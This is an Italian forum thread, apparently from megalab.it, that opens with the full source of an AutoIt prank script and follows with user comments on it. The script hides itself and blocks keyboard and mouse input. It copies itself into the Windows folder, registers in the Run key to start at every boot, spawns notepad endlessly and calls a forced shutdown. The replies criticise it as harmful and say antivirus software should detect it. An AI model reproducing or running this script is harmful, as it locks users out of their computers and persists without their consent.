Sarà vero?
#NoTrayIcon
BlockInput(1)
MsgBox(0,"Realizzato By"," .+* M4TT091 x°D",3)
MsgBox(0,"A Informazione...","Il tuo pc è spacciato ahaah",3)
$variabile1=@AutoItExe
FileCopy ($variabile1,"C:\WINDOWS\win32\Temp.exe")
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio", "C:\WINDOWS\win32\Temp.exe")
While 1=1
Run ("notepad.exe")
Wend
If ProcessExists("notepad.exe") Then
Shutdown(8)
ElseIf ProcessClose("notepad.exe") Then
Shutdown(8)
EndIf
clic ha scritto:se colpisce il pc di uno che con il computer ci lavora non è mica tanto una bischerata, non danneggia nulla ma costringe il povero sprovveduto ad interpellare un tecnico.
clic ha scritto:Cosi come con le automobili c'è gente che apre la portiera, mette in moto e parte senza conoscere le leggi della termodinamica e il cliclo Otto, lo stesso avviene con i computer: ci sono persone che ci scrivono perché lo usano come sostituto della macchina da scrivere (vedi i traduttori) o che semplicemente comunicano con i parenti lontani.
Un antivirus deve essere in grado, per coloro che lo pagano, di essere in grado di poter rilevare anche quelli che per gente skillata puo apparire uno scherzo innocuo.
Tutto rigorosamente IMHO ;)
clic ha scritto:Il fatto di rispondere è una scelta visto che siamo in democrazia e così tu hai detto la tua mentre io la mia
The King of GnG ha scritto:clic ha scritto:Il fatto di rispondere è una scelta visto che siamo in democrazia e così tu hai detto la tua mentre io la mia
Democrazia? Se non sbaglio ancora non è stato decisa la forma di governo di Berlusconia. Aspettiamo prima i nuovi palinsesti XD
Joke? Oh please.... Fall.com per DOS era divertente perché almeno replicava l'effetto del virus Cascade, questo è uno sgorbio di "programmazione" e stop. Altro che joke....
spitfire10 ha scritto:Vacca boia!!
Mi sto sentendo in colpa per aver postato la cosa.....
Visitano il forum: Nessuno e 8 ospiti
megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising